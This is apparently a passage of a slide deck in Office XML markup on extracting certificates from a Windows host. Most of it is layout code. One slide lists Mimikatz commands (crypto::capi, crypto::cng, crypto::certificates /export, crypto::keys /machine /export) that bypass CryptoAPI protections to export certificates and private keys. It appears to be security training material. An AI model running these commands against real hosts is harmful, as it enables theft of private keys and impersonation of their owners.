            <a:r>
              <a:rPr lang="en"/>
              <a:t>research</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> on their networks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="489" name="Google Shape;489;g21b58706213_0_1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="893700" y="3192449"/>
            <a:ext cx="7846501" cy="12862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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537150" y="1578400"/>
            <a:ext cx="5017500" cy="64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85185"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Extracting Certificates from a host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7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334500" y="2393646"/>
            <a:ext cx="3809500" cy="2749850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;174;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Crypto API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p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Certificates can be exported from CertMGR if that is enabled when you install a certificate.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Otherwise they are “secured” with the Crypto API.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>They can be trivially extracted using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397000" y="2749175"/>
            <a:ext cx="3937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onsolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>crypto::capi</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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onsolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>crypto::cng</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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onsolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>crypto::certificates /export</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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onsolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>crypto::certificates /export /systemstore:&lt;OPTION&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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onsolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>crypto::keys /export</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>crypto::keys /machine /export</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">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Mimikatz Export</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p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83" name="Google Shape;183;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="900173" y="1567550"/>
            <a:ext cx="7343654" cy="291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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537150" y="1578400"/>
            <a:ext cx="5017500" cy="64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n" sz="2400"/>
              <a:t>Signing up for certificates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